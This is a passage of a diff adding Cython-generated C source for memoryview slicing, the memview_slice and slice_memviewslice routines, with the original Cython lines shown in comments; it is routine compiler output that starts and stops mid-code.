(likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 747, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_8); + } + __Pyx_XDECREF_SET(__pyx_v_index, __pyx_t_8); + __pyx_t_8 = 0; + __pyx_v_dim = __pyx_t_5; + __pyx_t_5 = (__pyx_t_5 + 1); + + /* "View.MemoryView":748 + * + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): # <<<<<<<<<<<<<< + * cindex = index + * slice_memviewslice( + */ + __pyx_t_1 = (PyIndex_Check(__pyx_v_index) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":749 + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): + * cindex = index # <<<<<<<<<<<<<< + * slice_memviewslice( + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + */ + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_v_index); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 749, __pyx_L1_error) + __pyx_v_cindex = __pyx_t_9; + + /* "View.MemoryView":750 + * if PyIndex_Check(index): + * cindex = index + * slice_memviewslice( # <<<<<<<<<<<<<< + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + * dim, new_ndim, p_suboffset_dim, + */ + __pyx_t_10 = __pyx_memoryview_slice_memviewslice(__pyx_v_p_dst, (__pyx_v_p_src->shape[__pyx_v_dim]), (__pyx_v_p_src->strides[__pyx_v_dim]), (__pyx_v_p_src->suboffsets[__pyx_v_dim]), __pyx_v_dim, __pyx_v_new_ndim, __pyx_v_p_suboffset_dim, __pyx_v_cindex, 0, 0, 0, 0, 0, 0); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(1, 750, __pyx_L1_error) + + /* "View.MemoryView":748 + * + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): # <<<<<<<<<<<<<< + * cindex = index + * slice_memviewslice( + */ + goto __pyx_L6; + } + + /* "View.MemoryView":756 + * 0, 0, 0, # have_{start,stop,step} + * False) + * elif index is None: # <<<<<<<<<<<<<< + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + */ + __pyx_t_1 = (__pyx_v_index == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":757 + * False) + * elif index is None: + * p_dst.shape[new_ndim] = 1 # <<<<<<<<<<<<<< + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 + */ + (__pyx_v_p_dst->shape[__pyx_v_new_ndim]) = 1; + + /* "View.MemoryView":758 + * elif index is None: + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 # <<<<<<<<<<<<<< + * p_dst.suboffsets[new_ndim] = -1 + * new_ndim += 1 + */ + (__pyx_v_p_dst->strides[__pyx_v_new_ndim]) = 0; + + /* "View.MemoryView":759 + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 # <<<<<<<<<<<<<< + * new_ndim += 1 + * else: + */ + (__pyx_v_p_dst->suboffsets[__pyx_v_new_ndim]) = -1L; + + /* "View.MemoryView":760 + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 + * new_ndim += 1 # <<<<<<<<<<<<<< + * else: + * start = index.start or 0 + */ + __pyx_v_new_ndim = (__pyx_v_new_ndim + 1); + + /* "View.MemoryView":756 + * 0, 0, 0, # have_{start,stop,step} + * False) + * elif index is None: # <<<<<<<<<<<<<< + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + */ + goto __pyx_L6; + } + + /* "View.MemoryView":762 + * new_ndim += 1 + * else: + * start = index.start or 0 # <<<<<<<<<<<<<< + * stop = index.stop or 0 + * step = index.step or 0 + */ + /*else*/ { + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_start); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 762, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 762, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 762, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L7_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L7_bool_binop_done:; + __pyx_v_start = __pyx_t_9; + + /* "View.MemoryView":763 + * else: + * start = index.start or 0 + * stop = index.stop or 0 # <<<<<<<<<<<<<< + * step = index.step or 0 + * + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_stop); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 763, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 763, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 763, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L9_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L9_bool_binop_done:; + __pyx_v_stop = __pyx_t_9; + + /* "View.MemoryView":764 + * start = index.start or 0 + * stop = index.stop or 0 + * step = index.step or 0 # <<<<<<<<<<<<<< + * + * have_start = index.start is not None + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_step); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 764, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 764, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 764, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L11_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L11_bool_binop_done:; + __pyx_v_step = __pyx_t_9; + + /* "View.MemoryView":766 + * step = index.step or 0 + * + * have_start = index.start is not None # <<<<<<<<<<<<<< + * have_stop = index.stop is not None + * have_step = index.step is not None + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_start); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 766, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_start = __pyx_t_1; + + /* "View.MemoryView":767 + * + * have_start = index.start is not None + * have_stop = index.stop is not None # <<<<<<<<<<<<<< + * have_step = index.step is not None + * + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_stop); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 767, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_stop = __pyx_t_1; + + /* "View.MemoryView":768 + * have_start = index.start is not None + * have_stop = index.stop is not None + * have_step = index.step is not None # <<<<<<<<<<<<<< + * + * slice_memviewslice( + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_step); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 768, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_step = __pyx_t_1; + + /* "View.MemoryView":770 + * have_step = index.step is not None + * + * slice_memviewslice( # <<<<<<<<<<<<<< + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + * dim, new_ndim, p_suboffset_dim, + */ + __pyx_t_10 = __pyx_memoryview_slice_memviewslice(__pyx_v_p_dst, (__pyx_v_p_src->shape[__pyx_v_dim]), (__pyx_v_p_src->strides[__pyx_v_dim]), (__pyx_v_p_src->suboffsets[__pyx_v_dim]), __pyx_v_dim, __pyx_v_new_ndim, __pyx_v_p_suboffset_dim, __pyx_v_start, __pyx_v_stop, __pyx_v_step, __pyx_v_have_start, __pyx_v_have_stop, __pyx_v_have_step, 1); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(1, 770, __pyx_L1_error) + + /* "View.MemoryView":776 + * have_start, have_stop, have_step, + * True) + * new_ndim += 1 # <<<<<<<<<<<<<< + * + * if isinstance(memview, _memoryviewslice): + */ + __pyx_v_new_ndim = (__pyx_v_new_ndim + 1); + } + __pyx_L6:; + + /* "View.MemoryView":747 + * cdef bint have_start, have_stop, have_step + * + * for dim, index in enumerate(indices): # <<<<<<<<<<<<<< + * if PyIndex_Check(index): + * cindex = index + */ + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":778 + * new_ndim += 1 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":779 + * + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, # <<<<<<<<<<<<<< + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + + /* "View.MemoryView":780 + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, # <<<<<<<<<<<<<< + * memviewsliceobj.to_dtype_func, + * memview.dtype_is_object) + */ + if (unlikely(!__pyx_v_memviewsliceobj)) { __Pyx_RaiseUnboundLocalError("memviewsliceobj"); __PYX_ERR(1, 780, __pyx_L1_error) } + + /* "View.MemoryView":781 + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * else: + */ + if (unlikely(!__pyx_v_memviewsliceobj)) { __Pyx_RaiseUnboundLocalError("memviewsliceobj"); __PYX_ERR(1, 781, __pyx_L1_error) } + + /* "View.MemoryView":779 + * + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, # <<<<<<<<<<<<<< + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, + */ + __pyx_t_2 = __pyx_memoryview_fromslice(__pyx_v_dst, __pyx_v_new_ndim, __pyx_v_memviewsliceobj->to_object_func, __pyx_v_memviewsliceobj->to_dtype_func, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 779, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (!(likely(((__pyx_t_2) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_2, __pyx_memoryview_type))))) __PYX_ERR(1, 779, __pyx_L1_error) + __pyx_r = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":778 + * new_ndim += 1 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + */ + } + + /* "View.MemoryView":784 + * memview.dtype_is_object) + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * + */ + /*else*/ { + __Pyx_XDECREF((PyObject *)__pyx_r); + + /* "View.MemoryView":785 + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, + * memview.dtype_is_object) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = __pyx_memoryview_fromslice(__pyx_v_dst, __pyx_v_new_ndim, NULL, NULL, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 784, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + + /* "View.MemoryView":784 + * memview.dtype_is_object) + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * + */ + if (!(likely(((__pyx_t_2) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_2, __pyx_memoryview_type))))) __PYX_ERR(1, 784, __pyx_L1_error) + __pyx_r = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":711 + * + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): # <<<<<<<<<<<<<< + * cdef int new_ndim = 0, suboffset_dim = -1, dim + * cdef bint negative_step + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memview_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_memviewsliceobj); + __Pyx_XDECREF(__pyx_v_index); + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":793 + * + * @cname('__pyx_memoryview_slice_memviewslice') + * cdef int slice_memviewslice( # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * Py_ssize_t shape, Py_ssize_t stride, Py_ssize_t suboffset, + */ + +static int __pyx_memoryview_slice_memviewslice(__Pyx_memviewslice *__pyx_v_dst, Py_ssize_t __pyx_v_shape, Py_ssize_t __pyx_v_stride, Py_ssize_t __pyx_v_suboffset, int __pyx_v_dim, int __pyx_v_new_ndim, int *__pyx_v_suboffset_dim, Py_ssize_t __pyx_v_start, Py_ssize_t __pyx_v_stop, Py_ssize_t __pyx_v_step, int __pyx_v_have_start, int __pyx_v_have_stop, int __pyx_v_have_step, int __pyx_v_is_slice) { + Py_ssize_t __pyx_v_new_shape; + int __pyx_v_negative_step; + int __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":813 + * cdef bint negative_step + * + * if not is_slice: # <<<<<<<<<<<<<< + * + * if start < 0: + */ + __pyx_t_1 = (!__pyx_v_is_slice); + if (__pyx_t_1) { + + /* "View.MemoryView":815 + * if not is_slice: + * + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if not 0 <= start < shape: + */ + __pyx_t_1 = (__pyx_v_start < 0); + if (__pyx_t_1) { + + /* "View.MemoryView":816 + * + * if start < 0: + * start += shape # <<<<<<<<<<<<<< + * if not 0 <= start < shape: + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + */ + __pyx_v_start = (__pyx_v_start + __pyx_v_shape); + + /* "View.MemoryView":815 + * if not is_slice: + * + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if not 0 <= start < shape: + */ + } + + /* "View.MemoryView":817 + * if start < 0: + * start += shape + * if not 0 <= start < shape: # <<<<<<<<<<<<<< + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + * else: + */ + __pyx_t_1 = (0 <= __pyx_v_start); + if (__pyx_t_1) { + __pyx_t_1 = (__pyx_v_start < __pyx_v_shape); + } + __pyx_t_2 = (!__pyx_t_1); + if (__pyx_t_2) { + + /* "View.MemoryView":818 + * start += shape + * if not 0 <= start < shape: + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) # <<<<<<<<<<<<<< + * else: + * + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_IndexError, __pyx_kp_s_Index_out_of_bounds_axis_d, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 818, __pyx_L1_error) + + /* "View.MemoryView":817 + * if start < 0: + * start += shape + * if not 0 <= start < shape: # <<<<<<<<<<<<<< + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + * else: + */ + } + + /* "View.MemoryView":813 + * cdef bint negative_step + * + * if not is_slice: # <<<<<<<<<<<<<< + * + * if start < 0: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":821 + * else: + * + * if have_step: # <<<<<<<<<<<<<< + * negative_step = step < 0 + * if step == 0: + */ + /*else*/ { + __pyx_t_2 = (__pyx_v_have_step != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":822 + * + * if have_step: + * negative_step = step < 0 # <<<<<<<<<<<<<< + * if step == 0: + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + */ + __pyx_v_negative_step = (__pyx_v_step < 0); + + /* "View.MemoryView":823 + * if have_step: + * negative_step = step < 0 + * if step == 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + */ + __pyx_t_2 = (__pyx_v_step == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":824 + * negative_step = step < 0 + * if step == 0: + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) # <<<<<<<<<<<<<< + * else: + * negative_step = False + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_ValueError, __pyx_kp_s_Step_may_not_be_zero_axis_d, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 824, __pyx_L1_error) + + /* "View.MemoryView":823 + * if have_step: + * negative_step = step < 0 + * if step == 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + */ + } + + /* "View.MemoryView":821 + * else: + * + * if have_step: # <<<<<<<<<<<<<< + * negative_step = step < 0 + * if step == 0: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":826 + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + * negative_step = False # <<<<<<<<<<<<<< + * step = 1 + * + */ + /*else*/ { + __pyx_v_negative_step = 0; + + /* "View.MemoryView":827 + * else: + * negative_step = False + * step = 1 # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_step = 1; + } + __pyx_L6:; + + /* "View.MemoryView":830 + * + * + * if have_start: # <<<<<<<<<<<<<< + * if start < 0: + * start += shape + */ + __pyx_t_2 = (__pyx_v_have_start != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":831 + * + * if have_start: + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if start < 0: + */ + __pyx_t_2 = (__pyx_v_start < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":832 + * if have_start: + * if start < 0: + * start += shape # <<<<<<<<<<<<<< + * if start < 0: + * start = 0 + */ + __pyx_v_start = (__pyx_v_start + __pyx_v_shape); + + /* "View.MemoryView":833 + * if start < 0: + * start += shape + * if start < 0: # <<<<<<<<<<<<<< + * start = 0 + * elif start >= shape: + */ + __pyx_t_2 = (__pyx_v_start < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":834 + * start += shape + * if start < 0: + * start = 0 # <<<<<<<<<<<<<< + * elif start >= shape: + * if negative_step: + */ + __pyx_v_start = 0; + + /* "View.MemoryView":833 + * if start < 0: + * start += shape + * if start < 0: # <<<<<<<<<<<<<< + * start = 0 + * elif start >= shape: + */ + } + + /* "View.MemoryView":831 + * + * if have_start: + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if start < 0: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":835 + * if start < 0: + * start = 0 + * elif start >= shape: # <<<<<<<<<<<<<< + * if negative_step: + * start = shape - 1 + */ + __pyx_t_2 = (__pyx_v_start >= __pyx_v_shape); + if (__pyx_t_2) { + + /* "View.MemoryView":836 + * start = 0 + * elif start >= shape: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + if (__pyx_v_negative_step) { + + /* "View.MemoryView":837 + * elif start >= shape: + * if negative_step: + * start = shape - 1 # <<<<<<<<<<<<<< + * else: + * start = shape + */ + __pyx_v_start = (__pyx_v_shape - 1); + + /* "View.MemoryView":836 + * start = 0 + * elif start >= shape: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + goto __pyx_L11; + } + + /* "View.MemoryView":839 + * start = shape - 1 + * else: + * start = shape # <<<<<<<<<<<<<< + * else: + * if negative_step: + */ + /*else*/ { + __pyx_v_start = __pyx_v_shape; + } + __pyx_L11:; + + /* "View.MemoryView":835 + * if start < 0: + * start = 0 + * elif start >= shape: # <<<<<<<<<<<<<< + * if negative_step: + * start = shape - 1 + */ + } + __pyx_L9:; + + /* "View.MemoryView":830 + * + * + * if have_start: # <<<<<<<<<<<<<< + * if start < 0: + * start += shape + */ + goto __pyx_L8; + } + + /* "View.MemoryView":841 + * start = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + /*else*/ { + if (__pyx_v_negative_step) { + + /* "View.MemoryView":842 + * else: + * if negative_step: + * start = shape - 1 # <<<<<<<<<<<<<< + * else: + * start = 0 + */ + __pyx_v_start = (__pyx_v_shape - 1); + + /* "View.MemoryView":841 + * start = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + goto __pyx_L12; + } + + /* "View.MemoryView":844 + * start = shape - 1 + * else: + * start = 0 # <<<<<<<<<<<<<< + * + * if have_stop: + */ + /*else*/ { + __pyx_v_start = 0; + } + __pyx_L12:; + } + __pyx_L8:; + + /* "View.MemoryView":846 + * start = 0 + * + * if have_stop: # <<<<<<<<<<<<<< + * if stop < 0: + * stop += shape + */ + __pyx_t_2 = (__pyx_v_have_stop != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":847 + * + * if have_stop: + * if stop < 0: # <<<<<<<<<<<<<< + * stop += shape + * if stop < 0: + */ + __pyx_t_2 = (__pyx_v_stop < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":848 + * if have_stop: + * if stop < 0: + * stop += shape # <<<<<<<<<<<<<< + * if stop < 0: + * stop = 0 + */ + __pyx_v_stop = (__pyx_v_stop + __pyx_v_shape); + + /* "View.MemoryView":849 + * if stop < 0: + * stop += shape + * if stop < 0: # <<<<<<<<<<<<<< + * stop = 0 + * elif stop > shape: + */ + __pyx_t_2 = (__pyx_v_stop < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":850 + * stop += shape + * if stop < 0: + * stop = 0 # <<<<<<<<<<<<<< + * elif stop > shape: + * stop = shape + */ + __pyx_v_stop = 0; + + /* "View.MemoryView":849 + * if stop < 0: + * stop += shape + * if stop < 0: # <<<<<<<<<<<<<< + * stop = 0 + * elif stop > shape: + */ + } + + /* "View.MemoryView":847 + * + * if have_stop: + * if stop < 0: # <<<<<<<<<<<<<< + * stop += shape + * if stop < 0: + */ + goto __pyx_L14; + } + + /* "View.MemoryView":851 + * if stop < 0: + * stop = 0 + * elif stop > shape: # <<<<<<<<<<<<<< + * stop = shape + * else: + */ + __pyx_t_2 = (__pyx_v_stop > __pyx_v_shape); + if (__pyx_t_2) { + + /* "View.MemoryView":852 + * stop = 0 + * elif stop > shape: + * stop = shape # <<<<<<<<<<<<<< + * else: + * if negative_step: + */ + __pyx_v_stop = __pyx_v_shape; + + /* "View.MemoryView":851 + * if stop < 0: + * stop = 0 + * elif stop > shape: # <<<<<<<<<<<<<< + * stop = shape + * else: + */ + } + __pyx_L14:; + + /* "View.MemoryView":846 + * start = 0 + * + * if have_stop: # <<<<<<<<<<<<<< + * if stop < 0: + * stop += shape + */ + goto __pyx_L13; + } + + /* "View.MemoryView":854 + * stop = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * stop = -1 + * else: + */ + /*else*/ { + if (__pyx_v_negative_step) { + + /* "View.MemoryView":855 + * else: + * if negative_step: + * stop = -1 # <<<<<<<<<<<<<< + * else: + * stop = shape + */ + __pyx_v_stop = -1L; + + /* "View.MemoryView":854 + * stop = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * stop = -1 + * else: + */ + goto __pyx_L16; + } + + /* "View.MemoryView":857 + * stop = -1 + * else: + * stop = shape # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __pyx_v_stop = __pyx_v_shape; + } + __pyx_L16:; + } + __pyx_L13:; + + /* "View.MemoryView":861 + * + * with cython.cdivision(True): + * new_shape = (stop - start) // step # <<<<<<<<<<<<<< + * + * if (stop - start) - step * new_shape: + */ + __pyx_v_new_shape = ((__pyx_v_stop - __pyx_v_start) / __pyx_v_step); + + /* "View.MemoryView":863 + * new_shape = (stop - start) // step + * + * if (stop - start) - step * new_shape: # <<<<<<<<<<<<<< + * new_shape += 1 + * + */ + __pyx_t_2 = (((__pyx_v_stop - __pyx_v_start) - (__pyx_v_step * __pyx_v_new_shape)) != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":864 + * + * if (stop - start) - step * new_shape: + * new_shape += 1 # <<<<<<<<<<<<<< + * + * if new_shape < 0: + */ + __pyx_v_new_shape = (__pyx_v_new_shape + 1); + + /* "View.MemoryView":863 + * new_shape = (stop - start) // step + * + * if (stop - start) - step * new_shape: # <<<<<<<<<<<<<< + * new_shape += 1 + * + */ + } + + /* "View.MemoryView":866 + * new_shape += 1 + * + * if new_shape < 0: # <<<<<<<<<<<<<< + * new_shape = 0 + * + */ + __pyx_t_2 = (__pyx_v_new_shape < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":867 + * + * if new_shape < 0: + * new_shape = 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_new_shape = 0; + + /* "View.MemoryView":866 + * new_shape += 1 + * + * if new_shape < 0: # <<<<<<<<<<<<<< + * new_shape = 0 + * + */ + } + + /* "View.MemoryView":870 + * + * + * dst.strides[new_ndim] = stride * step # <<<<<<<<<<<<<< + * dst.shape[new_ndim] = new_shape + * dst.suboffsets[new_ndim] = suboffset + */ + (__pyx_v_dst->strides[__pyx_v_new_ndim]) = (__pyx_v_stride * __pyx_v_step); + + /* "View.MemoryView":871 + * + * dst.strides[new_ndim] = stride * step + * dst.shape[new_ndim] = new_shape # <<<<<<<<<<<<<< + * dst.suboffsets[new_ndim] = suboffset + * + */ + (__pyx_v_dst->shape[__pyx_v_new_ndim]) = __pyx_v_new_shape; + + /* "View.MemoryView":872 + * dst.strides[new_ndim] = stride * step + * dst.shape[new_ndim] = new_shape + * dst.suboffsets[new_ndim] = suboffset # <<<<<<<<<<<<<< + * + * + */ + (__pyx_v_dst->suboffsets[__pyx_v_new_ndim]) = __pyx_v_suboffset; + } + __pyx_L3:; + + /* "View.MemoryView":875 + * + * + * if suboffset_dim[0] < 0: # <<<<<<<<<<<<<< + * dst.data += start * stride + * else: + */ + __pyx_t_2 = ((__pyx_v_suboffset_dim[0]) < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":876 + * + * if suboffset_dim[0] < 0: + * dst.data += start * stride # <<<<<<<<<<<<<< + * else: + * dst.suboffsets[suboffset_dim[0]] += start * stride + */ + __pyx_v_dst->data = (__pyx_v_dst->data + (__pyx_v_start * __pyx_v_stride)); + + /* "View.MemoryView":875 + * + * + * if suboffset_dim[0] < 0: # <<<<<<<<<<<<<< + * dst.data += start * stride + * else: + */ + goto __pyx_L19; + } + + /* "View.MemoryView":878 + * dst.data += start * stride + * else: + * dst.suboffsets[suboffset_dim[0]] += start * stride # <<<<<<<<<<<<<< + * + * if suboffset >= 0: + */ + /*else*/ { + __pyx_t_3 = (__pyx_v_suboffset_dim[0]); + (__pyx_v_dst->suboffsets[__pyx_t_3]) = ((__pyx_v_dst->suboffsets[__pyx_t_3]) + (__pyx_v_start * __pyx_v_stride)); + } + __pyx_L19:; + + /* "View.MemoryView":880 + * dst.suboffsets[suboffset_dim[0]] += start * stride + * + * if suboffset >= 0: # <<<<<<<<<<<<<< + * if not is_slice: + * if new_ndim == 0: + */ + __pyx_t_2 = (__pyx_v_suboffset >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":881 + * + * if suboffset >= 0: + * if not is_slice: # <<<<<<<<<<<<<< + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset + */ + __pyx_t_2 = (!__pyx_v_is_slice); + if (__pyx_t_2) { + + /* "View.MemoryView":882 + * if suboffset >= 0: + * if not is_slice: + * if new_ndim == 0: # <<<<<<<<<<<<<< + * dst.data = ( dst.data)[0] + suboffset + * else: + */ + __pyx_t_2 = (__pyx_v_new_ndim == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":883 + * if 